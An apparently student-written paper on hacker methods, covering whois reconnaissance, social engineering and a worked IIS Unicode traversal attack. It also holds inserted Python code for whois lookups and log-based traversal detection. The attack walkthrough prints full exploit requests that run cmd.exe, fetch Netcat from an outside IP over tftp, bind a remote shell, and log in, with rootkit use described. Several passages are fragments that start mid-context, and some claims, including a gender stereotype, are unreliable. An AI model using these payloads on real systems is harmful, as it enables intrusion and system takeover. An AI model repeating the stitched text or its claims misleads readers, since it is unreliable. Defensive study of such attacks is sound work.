Abstract
Companies lose millions of dollars due to bad security practices. More users join the Internet every day, and only a very small percentage of them know how to defend themselves. To beat hackers at their own game, it is important to understand how they get into systems: knowing the tools and tricks of the trade that hackers use makes one better able to defend against an attack. This paper also discusses a standard attack plan that most attackers follow, defensive programs, how to maximize security, and how the law punishes convicted hacking offenders.
Introduction
A hacker is a Database Administrator's (DBA's) worst nightmare. A company could go bankrupt or lose millions of dollars due to bad security practices. Whether there are multiple attackers or just a single attacker, the company is totally dependent on the DBA. Some Database Administrators would rather go into a heavy military war zone than have to defend against an attack [1]. A patient hacker has an unlimited amount of time and resources to try to crack the case.
Types of Attackers
There are three types of attackers, arranged in the form of a pyramid [2]. On the bottom portion of the pyramid are what are known as Script Kiddies. They have limited knowledge of computer technology and programming. A Script Kiddie simply acquires scripts found on the Internet and runs them; in general, they fire off random scripts until something works. They tend to get caught more frequently due to their lack of knowledge; however, they still pose a dramatic threat to organizations. In the middle of the pyramid is the IT-savvy person. These people understand how to use programming and scripting languages. They also understand vulnerabilities, although in most cases they cannot find new ones. They are intelligent enough to use exploit code and tools with precision. At the top of the pyramid is the cream of the crop: people with the IQs to boil water. They have the ability to find new vulnerabilities and to write exploit code and tools. Thankfully, the people at the top of the pyramid are limited in number. However, they cause the most problems, not only because of their intelligence, but also because of their general willingness to release the tools they have made to the public.
This stealth scan will provide the attacker with the remaining IP addresses on the network, all of the open ports on each host, and other details, depending on the scanner.
Whois Databases
In just about every case, an attacker will consult these databases to do the basic research needed to get started. Whois queries provide a hacker with the majority of the information needed to begin an attack [2]. There are four main types of queries: registrar, domain, network, and point of contact [2]. A great place to find registrar information is http://www.internic.net/whois.html. A target often has several registrars, and Internic.net has a rather large listing of associated registrar information. An attacker must determine the correct registrar so that he or she can submit detailed queries to the correct database in subsequent steps [2]. Once the correct registrar is found, a domain query is the next step. A domain query will often provide the name of the registrant, the domain name, the administrative contact, when the record was created and updated, and the primary and secondary DNS servers [2]. This query can be run at the same site used for registrar information.
A network query returns the specific network blocks that an organization owns. The American Registry for Internet Numbers (ARIN) is a popular database for determining the networks associated with a target domain [2]. The web page for this database is http://www.arin.net. The ARIN database can also be used for point of contact (POC) queries. If an email address is provided in the domain query, it can be used to find more information by searching the ARIN database with that address directly. Sometimes this turns up additional domains that the attacker did not previously know about [2].
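The domain query described above, worked as an added example (not code from the paper or its sources): a minimal RFC 3912 whois client and a parser that pulls out the registrant, contact, date and name-server fields the paper lists, so an administrator can see what their own record exposes. The connection is injectable; by default it replays a constructed reply so the code runs offline, and `whois.internic.net` and the field names are assumptions about the server's output format.

```python
import socket

def whois_request(query, server, connect=socket.create_connection):
    """One RFC 3912 exchange: TCP port 43, send query + CRLF, read to EOF."""
    with connect((server, 43), timeout=10) as conn:
        conn.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while data := conn.recv(4096):
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")

def parse_whois(text):
    """Collect 'Key: value' lines; repeated keys (Name Server) become lists."""
    record = {}
    for line in text.splitlines():
        if line.startswith(("%", "#")) or ":" not in line:
            continue  # server banners and comments
        key, _, value = line.partition(":")
        if value.strip():
            record.setdefault(key.strip(), []).append(value.strip())
    return {k: v[0] if len(v) == 1 else v for k, v in record.items()}

# Constructed reply for the offline run (not real registry data)
SAMPLE_RESPONSE = b"""% constructed whois reply
Registrant: Example Corp
Admin Contact: hostmaster@example.com
Created: 1995-08-14
Updated: 2003-07-30
Name Server: NS1.EXAMPLE.COM
Name Server: NS2.EXAMPLE.COM
"""

class FakeConn:
    """Socket stand-in that records the query sent and replays SAMPLE_RESPONSE."""
    sent = b""
    def __init__(self, addr, timeout=None): self._buf = SAMPLE_RESPONSE
    def __enter__(self): return self
    def __exit__(self, *exc): return False
    def sendall(self, data): FakeConn.sent += data
    def recv(self, n):
        data, self._buf = self._buf[:n], self._buf[n:]
        return data

def domain_query(domain, server="whois.internic.net", connect=FakeConn):
    """Return just the fields the paper says a domain query exposes."""
    rec = parse_whois(whois_request(domain, server, connect))
    wanted = ("Registrant", "Admin Contact", "Created", "Updated", "Name Server")
    return {k: rec[k] for k in wanted if k in rec}
```

Passing `connect=socket.create_connection` performs a live lookup of the given domain against the chosen server.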
Social Engineering
An attacker often requires help from inside the organization. An attacker's main goal in using social engineering is to act as if he or she belongs. By gaining the trust of individuals, the attacker may not even have to do any hacking. An old epidemic from several years ago was the I LOVE YOU virus, which attached itself to emails and then mass-mailed itself using the target's address book. The reason this virus had such an impact was its subject line: many people who were not IT savvy could not resist finding out who loved them so much [1]. This example did not involve hacking; however, hackers can use the same ploys to trick people into doing what they want. If an attacker were extremely dedicated to cracking a company, he or she might go to its headquarters. A perfect demonstration of an attacker arriving at a headquarters is given in the following example [3]: After arriving at the target location, the social engineer strikes up small talk with another employee as they walk toward the building. When they arrive at the locked door, the social engineer will pat down his coat pockets, looking for his key or pass card. In such a case, most anyone will do the other guy a favor and let him in with their key. Far from playing the part of the nervous interloper, the social engineer will enter the premises with calm confidence, pretending he truly belongs where he is. All the while, he will move about in a totally unassuming manner, obliquely acknowledging others going about his job. All the while, he will make a point of not attracting attention to himself, unobtrusively scoping the surroundings for tidbits of information that will aid him in his goal. The main systems are typically easy to locate as they are invariably showcased behind large glass walls. The OS of the systems running inside the network will be painfully obvious from the unattended monitors, which display the user interface and even the OS version number.
The presence of Sun Microsystems Sparc hardware in the computer room narrows the OS possibilities down to Solaris or RedHat Linux. The toy penguins in the lead developer's office are sufficient clue that Linux is widely used. A stroll through the cubicles leads to the discovery of a number of Post-It notes near (or even on) a monitor that reveal a user's current login and password combination. The example above may be a bit extreme; however, everything it describes is quite possible with social engineering skills.
Another issue in social engineering is women. A lot of men don't think of women as IT savvy and will give out more information to them because the men don't think the women can do any damage with it [3].
Nmap run completed -- 256 IP addresses (1 host up) scanned in 360 seconds

From the Nmap results, there are many possible vulnerabilities across the different services listed. One of the easiest to try is telnet, which is used in the steps below. If any of the services listed by Nmap are vulnerable, the chances are pretty good that a hacker can get access. This Nmap result is actually quite small, since it covers 256 IP addresses; however, even one host with multiple open ports can lead to serious issues.
Escape character is '^]'.
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+echo+test+message+>+test.msg

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Fri, 16 Feb 2001 19:20:32 GMT
Content-Length: 0
Content-Type: text/plain

Connection closed by foreign host.

This attempt appears to be successful, but to make sure it worked, we need to read back the file we attempted to write on the server [3]. If that succeeds, we can both read and write on the server, which allows us to do just about anything we want to compromise the system. To test the result, open another Telnet connection and issue the following GET [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+type+test.msg

If the response shows "test message", the contents of the file created earlier, the write was successful. This pretty much allows the attacker to do anything he or she wants [3]. To carry out the full-scale attack, the attacker needs a few tools. A rootkit is needed to hide the attacker's tracks [3]; rootkits can be downloaded from many different sites on the Internet, and the correct one must be chosen for the target's operating system and for the attack being carried out. Another necessary item is a way to bind a chosen port on the target system so the attacker can log in directly [3]; the program used in this example is Netcat. With these two tools, the attack can proceed.
The Attack
The attacker needs a way to download the rootkit and Netcat onto the target system. Since Windows NT does not support passive FTP, the attacker uses TFTP (Trivial File Transfer Protocol) instead, issued through the same GET technique [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp+-i+216.240.45.60+GET+nc.exe

Netcat and the rootkit are fetched with two separate GETs of this form, substituting the respective file names for nc.exe [3]. Once the files are on the server, the attacker issues a Netcat command to bind a port for his or her own use. Here is an example of using the GET command to bind a port with Netcat [3]:

GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+nc.exe+-l+-p+100+-t+-e+cmd.exe

The port must not already be in use by the system, so port 100 is used in this example. After this step, the attacker issues one final command to get system access [3]:

$ telnet 208.37.215.233 100
Trying 208.37.215.233...
Connected to 208.37.215.233.
Escape character is '^]'.
C:\winnt\system32\>
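The traversal requests in the two sections above all rely on the same trick: IIS checked the raw path for ".." before decoding it, and the percent-encoded bytes %c1%9c are an overlong UTF-8 spelling of a backslash that the decoder then accepted. The following detection routine, added here as an example and not taken from the paper or its sources, percent-decodes each logged request path, folds the overlong forms of '/' and '\' back to ASCII, and then flags traversal and the tool names the attack chain uses (cmd.exe, tftp, nc.exe). The log lines and the column layout are constructed, not real IIS logs.

```python
from urllib.parse import unquote_to_bytes
# Constructed IIS-style log lines (not from the paper): date time client method path query status
SAMPLE_LOG = """\
2001-02-16 19:20:32 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+echo+test+message+>+test.msg 200
2001-02-16 19:20:40 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+type+test.msg 200
2001-02-16 19:21:05 10.0.0.7 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+tftp+-i+10.0.0.7+GET+nc.exe 200
2001-02-16 19:22:10 10.0.0.9 GET /scripts/search.asp q=test 200
2001-02-16 19:23:00 10.0.0.9 GET /images/logo.gif - 200
"""

SUSPICIOUS_TOOLS = ("cmd.exe", "tftp", "nc.exe")

def decode_overlong(raw: bytes) -> str:
    """Map bytes to text, folding the 2-byte overlong UTF-8 forms that
    IIS 4/5 accepted (C0 AF -> '/', C1 9C -> '\\') to ASCII so that a
    later '..' check sees the path the server actually used."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2  # a strict UTF-8 decoder would reject this sequence
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def normalize_path(path: str) -> str:
    """Percent-decode, fold overlong sequences, and treat '\\' as '/'."""
    return decode_overlong(unquote_to_bytes(path)).replace("\\", "/")

def classify(line: str):
    """Return (client, reason, normalized path) for a hit, else None."""
    fields = line.split()
    if len(fields) < 7:
        return None
    client, path, query = fields[2], fields[4], fields[5]
    norm = normalize_path(path)
    if "/../" in norm:
        return (client, "traversal", norm)
    text = (norm + " " + query.replace("+", " ")).lower()
    for tool in SUSPICIOUS_TOOLS:
        if tool in text:
            return (client, "tool:" + tool, norm)
    return None

def scan_log(text: str):
    """Run classify() over every line and keep the hits."""
    return [hit for hit in map(classify, text.splitlines()) if hit]
```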
This whole process may seem a bit complicated, but these vulnerabilities are clearly listed on the Internet, sometimes with a step-by-step process just like the one I have gone through. Once the attacker has system access, he or she installs the rootkit to hide everything that has just happened from the System Administrator.
A System Administrator can also set up an easy entry point deliberately, to draw hackers in. A trap like this, if properly set up, will be flagged immediately, and hopefully the hacker leaves some information behind.
Conclusion
There are many types of hackers out there, all of whom are dangerous. To successfully penetrate a system, an attacker needs tools and information. There is nothing you can do to stop hacking tools from being spread around, but you can protect yourself from an invasion by hiding information. Anything is penetrable, no matter how secure; however, the more secure a network is, the harder it is to crack. Not all hacking is done over the Internet. Be wary of disgruntled employees and social engineering ploys. Disgruntled employees do the majority of all attacks. The best way to protect a network from invasion is to apply the latest patches from vendors. This alone will cancel out hundreds of known vulnerabilities and make a system, or network, much safer.
References
[1] Ahmad, David R. Mirza; Russell, Ryan. Hack Proofing Your Network. Rockland: Syngress Publishing, Inc., 2002.
[2] McClure, Stuart; Scambray, Joel; Kurtz, George. Hacking Exposed: Network Security Secrets & Solutions. Fourth Edition. Berkeley: Nordin, 2003.
[3] Hack Proofing Your Web Applications: The Only Way to Stop a Hacker is to Think Like One. Rockland: Syngress Publishing, Inc., 2001.
[4] Chirillo, John. Hack Attacks Testing: How to Conduct Your Own Security Audit. Indianapolis: John Wiley & Sons, Inc., 2003.